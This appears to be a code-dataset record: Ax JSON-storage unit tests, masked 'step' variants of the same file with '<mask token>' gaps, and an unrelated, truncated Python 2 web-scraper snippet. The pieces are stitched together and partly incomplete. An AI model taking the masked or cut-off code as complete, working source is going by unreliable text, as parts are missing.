"dtype": {"__type": "torch_dtype", "value": "torch.float64"},
"device": {"__type": "torch_device", "value": "cpu"},
}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
# Model has not yet been initialized on this GS since it hasn't generated
# anything yet.
self.assertIsNone(new_generation_strategy.model)
# Check that we can encode and decode the generation strategy after
# it has generated some generator runs. Since we now need to `gen`,
# we remove the fake callable kwarg we added, since model does not
# expect it.
generation_strategy = get_generation_strategy(with_callable_model_kwarg=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
# Since this GS has now generated one generator run, model should have
# been initialized and restored when decoding from JSON.
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
# Check that we can encode and decode the generation strategy after
# it has generated some trials and been updated with some data.
generation_strategy = new_generation_strategy
experiment.new_trial(gr) # Add previously generated GR as trial.
# Make generation strategy aware of the trial's data via `gen`.
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(
branin_problem.f(1, 2), new_branin_problem.f(1, 2), branin(1, 2)
)
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
# Test using `from_botorch`.
ackley_problem = SimpleBenchmarkProblem(
f=from_botorch(Ackley()), noise_sd=0.0, minimize=True
)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(
ackley_problem.f(1, 2), new_ackley_problem.f(1, 2), ackley(1, 2)
)
def testRegistryAdditions(self):
class MyRunner(Runner):
def run():
pass
def staging_required():
return False
class MyMetric(Metric):
pass
register_metric(MyMetric)
register_runner(MyRunner)
experiment = get_experiment_with_batch_and_single_trial()
experiment.runner = MyRunner()
experiment.add_tracking_metric(MyMetric(name="my_metric"))
with tempfile.NamedTemporaryFile(mode="w+", delete=False, suffix=".json") as f:
save_experiment(experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, experiment)
os.remove(f.name)
def testEncodeUnknownClassToDict(self):
# Cannot encode `UnknownClass` type because it is not registered in the
# CLASS_ENCODER_REGISTRY.
class UnknownClass:
def __init__(self):
pass
with self.assertRaisesRegex(
ValueError, "is a class. Add it to the CLASS_ENCODER_REGISTRY"
):
object_to_json(UnknownClass)
# `UnknownClass` type is registered in the CLASS_ENCODER_REGISTRY and uses the
# `botorch_modular_to_dict` encoder, but `UnknownClass` is not registered in
# the `botorch_modular_registry.py` file.
CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict
with self.assertRaisesRegex(
ValueError,
"does not have a corresponding parent class in CLASS_TO_REGISTRY",
):
object_to_json(UnknownClass)
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(
ValueError,
"does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY",
):
class_from_json({"index": 0, "class": "unknown_path"})
|
flexible
|
{
"blob_id": "52eec56f7f5da8356f61301994f846ef7769f73b",
"index": 6189,
"step-1": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n <mask token>\n <mask token>\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n <mask token>\n <mask token>\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n <mask token>\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], 'test.json')\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n <mask token>\n <mask token>\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'\n ):\n class_from_json({'index': 0, 'class': 'unknown_path'})\n",
"step-4": "<mask token>\n\n\nclass JSONStoreTest(TestCase):\n\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\n 'foobar'))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\n 'foobar'))\n self.assertRaises(JSONDecodeError, object_from_json, {'__type':\n 'foobar'})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], 'test.json')\n\n def testValidateFilename(self):\n bad_filename = 'test'\n self.assertRaises(ValueError, save_experiment, self.experiment,\n bad_filename)\n <mask token>\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,\n device=torch.device('cpu'))\n expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0, \n 4.0]], 'dtype': {'__type': 'torch_dtype', 'value':\n 'torch.float64'}, 'device': {'__type': 'torch_device', 'value':\n 'cpu'}}\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsNone(new_generation_strategy.model)\n generation_strategy = get_generation_strategy(with_callable_model_kwarg\n =False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr)\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json\n (arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),\n branin(1, 2))\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),\n noise_sd=0.0, minimize=True)\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),\n ackley(1, 2))\n\n def testRegistryAdditions(self):\n\n\n class MyRunner(Runner):\n\n def run():\n pass\n\n def staging_required():\n return False\n\n\n class MyMetric(Metric):\n pass\n register_metric(MyMetric)\n register_runner(MyRunner)\n experiment = get_experiment_with_batch_and_single_trial()\n experiment.runner = MyRunner()\n experiment.add_tracking_metric(MyMetric(name='my_metric'))\n with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=\n '.json') as f:\n save_experiment(experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, experiment)\n os.remove(f.name)\n\n def testEncodeUnknownClassToDict(self):\n\n\n class UnknownClass:\n\n def __init__(self):\n pass\n with self.assertRaisesRegex(ValueError,\n 'is a class. Add it to the CLASS_ENCODER_REGISTRY'):\n object_to_json(UnknownClass)\n CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding parent class in CLASS_TO_REGISTRY'):\n object_to_json(UnknownClass)\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(ValueError,\n 'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'\n ):\n class_from_json({'index': 0, 'class': 'unknown_path'})\n",
"step-5": "#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nimport tempfile\nfrom functools import partial\n\nimport numpy as np\nimport torch\nfrom ax.benchmark.benchmark_problem import SimpleBenchmarkProblem\nfrom ax.core.metric import Metric\nfrom ax.core.runner import Runner\nfrom ax.exceptions.storage import JSONDecodeError, JSONEncodeError\nfrom ax.modelbridge.base import ModelBridge\nfrom ax.modelbridge.registry import Models\nfrom ax.storage.json_store.decoder import (\n generation_strategy_from_json,\n object_from_json,\n)\nfrom ax.storage.json_store.decoders import class_from_json\nfrom ax.storage.json_store.encoder import object_to_json\nfrom ax.storage.json_store.encoders import botorch_modular_to_dict\nfrom ax.storage.json_store.load import load_experiment\nfrom ax.storage.json_store.registry import CLASS_ENCODER_REGISTRY\nfrom ax.storage.json_store.save import save_experiment\nfrom ax.storage.metric_registry import register_metric\nfrom ax.storage.runner_registry import register_runner\nfrom ax.utils.common.testutils import TestCase\nfrom ax.utils.measurement.synthetic_functions import ackley, branin, from_botorch\nfrom ax.utils.testing.benchmark_stubs import (\n get_branin_benchmark_problem,\n get_branin_simple_benchmark_problem,\n get_mult_simple_benchmark_problem,\n get_sum_simple_benchmark_problem,\n)\nfrom ax.utils.testing.core_stubs import (\n get_abandoned_arm,\n get_acquisition_function_type,\n get_acquisition_type,\n get_arm,\n get_augmented_branin_metric,\n get_augmented_hartmann_metric,\n get_batch_trial,\n get_botorch_model,\n get_botorch_model_with_default_acquisition_class,\n get_branin_data,\n get_branin_experiment,\n get_branin_metric,\n get_choice_parameter,\n get_experiment_with_batch_and_single_trial,\n get_experiment_with_data,\n get_experiment_with_trial_with_ttl,\n get_experiment_with_map_data_type,\n get_factorial_metric,\n get_fixed_parameter,\n get_generator_run,\n get_map_data,\n get_hartmann_metric,\n get_list_surrogate,\n get_metric,\n get_mll_type,\n get_model_type,\n get_multi_objective,\n get_multi_objective_optimization_config,\n get_multi_type_experiment,\n get_objective,\n get_objective_threshold,\n get_optimization_config,\n get_order_constraint,\n get_outcome_constraint,\n get_parameter_constraint,\n get_percentile_early_stopping_strategy,\n get_range_parameter,\n get_scalarized_objective,\n get_search_space,\n get_simple_experiment_with_batch_trial,\n get_sum_constraint1,\n get_sum_constraint2,\n get_surrogate,\n get_synthetic_runner,\n get_trial,\n)\nfrom ax.utils.testing.modeling_stubs import (\n get_generation_strategy,\n get_observation_features,\n get_transform_type,\n)\nfrom botorch.test_functions.synthetic import Ackley\n\n\nTEST_CASES = [\n (\"AbandonedArm\", get_abandoned_arm),\n (\"Arm\", get_arm),\n (\"AugmentedBraninMetric\", get_augmented_branin_metric),\n (\"AugmentedHartmannMetric\", get_augmented_hartmann_metric),\n (\"BatchTrial\", get_batch_trial),\n (\"BenchmarkProblem\", get_branin_benchmark_problem),\n (\"BoTorchModel\", get_botorch_model),\n (\"BoTorchModel\", get_botorch_model_with_default_acquisition_class),\n (\"BraninMetric\", get_branin_metric),\n (\"ChoiceParameter\", get_choice_parameter),\n (\"Experiment\", get_experiment_with_batch_and_single_trial),\n (\"Experiment\", get_experiment_with_trial_with_ttl),\n (\"Experiment\", get_experiment_with_data),\n (\"Experiment\", get_experiment_with_map_data_type),\n (\"FactorialMetric\", get_factorial_metric),\n (\"FixedParameter\", get_fixed_parameter),\n (\"Hartmann6Metric\", get_hartmann_metric),\n (\"GenerationStrategy\", partial(get_generation_strategy, with_experiment=True)),\n (\"GeneratorRun\", get_generator_run),\n (\"ListSurrogate\", get_list_surrogate),\n (\"MapData\", get_map_data),\n (\"Metric\", get_metric),\n (\"MultiObjective\", get_multi_objective),\n (\"MultiObjectiveOptimizationConfig\", get_multi_objective_optimization_config),\n (\"MultiTypeExperiment\", get_multi_type_experiment),\n (\"ObservationFeatures\", get_observation_features),\n (\"Objective\", get_objective),\n (\"ObjectiveThreshold\", get_objective_threshold),\n (\"OptimizationConfig\", get_optimization_config),\n (\"OrderConstraint\", get_order_constraint),\n (\"OutcomeConstraint\", get_outcome_constraint),\n (\"PercentileEarlyStoppingStrategy\", get_percentile_early_stopping_strategy),\n (\"ParameterConstraint\", get_parameter_constraint),\n (\"RangeParameter\", get_range_parameter),\n (\"ScalarizedObjective\", get_scalarized_objective),\n (\"SearchSpace\", get_search_space),\n (\"SimpleBenchmarkProblem\", get_mult_simple_benchmark_problem),\n (\"SimpleBenchmarkProblem\", get_branin_simple_benchmark_problem),\n (\"SimpleBenchmarkProblem\", get_sum_simple_benchmark_problem),\n (\"SimpleExperiment\", get_simple_experiment_with_batch_trial),\n (\"SumConstraint\", get_sum_constraint1),\n (\"SumConstraint\", get_sum_constraint2),\n (\"Surrogate\", get_surrogate),\n (\"SyntheticRunner\", get_synthetic_runner),\n (\"Type[Acquisition]\", get_acquisition_type),\n (\"Type[AcquisitionFunction]\", get_acquisition_function_type),\n (\"Type[Model]\", get_model_type),\n (\"Type[MarginalLogLikelihood]\", get_mll_type),\n (\"Type[Transform]\", get_transform_type),\n (\"Trial\", get_trial),\n]\n\n\nclass JSONStoreTest(TestCase):\n def setUp(self):\n self.experiment = get_experiment_with_batch_and_single_trial()\n\n def testJSONEncodeFailure(self):\n self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(\"foobar\"))\n\n def testJSONDecodeFailure(self):\n self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(\"foobar\"))\n self.assertRaises(JSONDecodeError, object_from_json, {\"__type\": \"foobar\"})\n\n def testSaveAndLoad(self):\n with tempfile.NamedTemporaryFile(mode=\"w+\", delete=False, suffix=\".json\") as f:\n save_experiment(self.experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, self.experiment)\n os.remove(f.name)\n\n def testSaveValidation(self):\n with self.assertRaises(ValueError):\n save_experiment(self.experiment.trials[0], \"test.json\")\n\n def testValidateFilename(self):\n bad_filename = \"test\"\n self.assertRaises(ValueError, save_experiment, self.experiment, bad_filename)\n\n def testEncodeDecode(self):\n for class_, fake_func in TEST_CASES:\n # Can't load trials from JSON, because a batch needs an experiment\n # in order to be initialized\n if class_ == \"BatchTrial\" or class_ == \"Trial\":\n continue\n\n # Can't load parameter constraints from JSON, because they require\n # a SearchSpace in order to be initialized\n if class_ == \"OrderConstraint\" or class_ == \"SumConstraint\":\n continue\n\n original_object = fake_func()\n json_object = object_to_json(original_object)\n converted_object = object_from_json(json_object)\n\n if class_ == \"SimpleExperiment\":\n # Evaluation functions will be different, so need to do\n # this so equality test passes\n with self.assertRaises(RuntimeError):\n converted_object.evaluation_function(parameterization={})\n\n original_object.evaluation_function = None\n converted_object.evaluation_function = None\n\n self.assertEqual(\n original_object,\n converted_object,\n msg=f\"Error encoding/decoding {class_}.\",\n )\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor(\n [[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64, device=torch.device(\"cpu\")\n )\n expected_json = {\n \"__type\": \"Tensor\",\n \"value\": [[1.0, 2.0], [3.0, 4.0]],\n \"dtype\": {\"__type\": \"torch_dtype\", \"value\": \"torch.float64\"},\n \"device\": {\"__type\": \"torch_device\", \"value\": \"cpu\"},\n }\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n # Model has not yet been initialized on this GS since it hasn't generated\n # anything yet.\n self.assertIsNone(new_generation_strategy.model)\n\n # Check that we can encode and decode the generation strategy after\n # it has generated some generator runs. Since we now need to `gen`,\n # we remove the fake callable kwarg we added, since model does not\n # expect it.\n generation_strategy = get_generation_strategy(with_callable_model_kwarg=False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n # Since this GS has now generated one generator run, model should have\n # been initialized and restored when decoding from JSON.\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n # Check that we can encode and decode the generation strategy after\n # it has generated some trials and been updated with some data.\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr) # Add previously generated GR as trial.\n # Make generation strategy aware of the trial's data via `gen`.\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json(arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(\n branin_problem.f(1, 2), new_branin_problem.f(1, 2), branin(1, 2)\n )\n self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)\n # Test using `from_botorch`.\n ackley_problem = SimpleBenchmarkProblem(\n f=from_botorch(Ackley()), noise_sd=0.0, minimize=True\n )\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(\n ackley_problem.f(1, 2), new_ackley_problem.f(1, 2), ackley(1, 2)\n )\n\n def testRegistryAdditions(self):\n class MyRunner(Runner):\n def run():\n pass\n\n def staging_required():\n return False\n\n class MyMetric(Metric):\n pass\n\n register_metric(MyMetric)\n register_runner(MyRunner)\n\n experiment = get_experiment_with_batch_and_single_trial()\n experiment.runner = MyRunner()\n experiment.add_tracking_metric(MyMetric(name=\"my_metric\"))\n with tempfile.NamedTemporaryFile(mode=\"w+\", delete=False, suffix=\".json\") as f:\n save_experiment(experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, experiment)\n os.remove(f.name)\n\n def testEncodeUnknownClassToDict(self):\n # Cannot encode `UnknownClass` type because it is not registered in the\n # CLASS_ENCODER_REGISTRY.\n class UnknownClass:\n def __init__(self):\n pass\n\n with self.assertRaisesRegex(\n ValueError, \"is a class. Add it to the CLASS_ENCODER_REGISTRY\"\n ):\n object_to_json(UnknownClass)\n # `UnknownClass` type is registered in the CLASS_ENCODER_REGISTRY and uses the\n # `botorch_modular_to_dict` encoder, but `UnknownClass` is not registered in\n # the `botorch_modular_registry.py` file.\n CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict\n with self.assertRaisesRegex(\n ValueError,\n \"does not have a corresponding parent class in CLASS_TO_REGISTRY\",\n ):\n object_to_json(UnknownClass)\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(\n ValueError,\n \"does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY\",\n ):\n class_from_json({\"index\": 0, \"class\": \"unknown_path\"})\n",
"step-ids": [
7,
10,
12,
14,
18
]
}
|
[
7,
10,
12,
14,
18
] |
from bs4 import BeautifulSoup
import urllib2
def get_begin_data(url):
headers = {
'ser-Agent': '',
'Cookie': ''
}
request = urllib2.Request(url, headers=headers)
web_data = urllib2.urlopen(request)
soup = BeautifulSoup(web_data, 'html.parser')
results = soup.select('table > tr > td > a')
answers = soup.select('table > tr > td > span')
index = 0
datas = []
for result in results:
if index == 0:
data = {
'link': result.get('href')
}
index += 1
elif index == 1:
data['title'] = result.get_text()
datas.append(data)
index += 1
elif index == 2:
